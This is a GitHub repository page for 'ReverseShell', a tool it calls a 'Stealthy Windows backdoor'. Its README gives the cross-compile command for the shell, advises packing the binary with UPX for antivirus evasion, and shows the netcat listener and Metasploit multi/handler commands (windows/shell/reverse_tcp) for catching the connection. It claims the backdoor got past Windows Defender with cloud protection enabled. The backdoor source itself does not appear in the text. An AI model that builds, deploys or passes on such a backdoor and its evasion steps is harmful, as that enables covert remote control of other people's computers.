Skip to content

whichbuffer/ReverseShell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
 
 
 
 
 
 
 
 

Repository files navigation

POC

https://twitter.com/whichbuffer/status/1333889053851340805?s=20

https://www.youtube.com/watch?v=4k0Xkf4PuMs

Compile it

i686-w64-mingw32-g++ shell.cpp -o shell.exe -lws2_32 -lwininet -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

After Compile the exe file then use UPX (https://upx.github.io/) for the AV Evasion

Start the netcat Listener

 nc -lvnp <port number>

Metasploit Handler

 use exploit/multi/handler
 set PAYLOAD windows/shell/reverse_tcp
 set LHOST <Local IP>
 set LPORT <Local Port>
 exploit -j -z 

Screenshot-from-2020-11-30-12-24-52

Tested on updated(30.11.2020) Windows 10 device with Windows Defender and Cloud Protection enabled.

About

Stealthy Windows backdoor

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages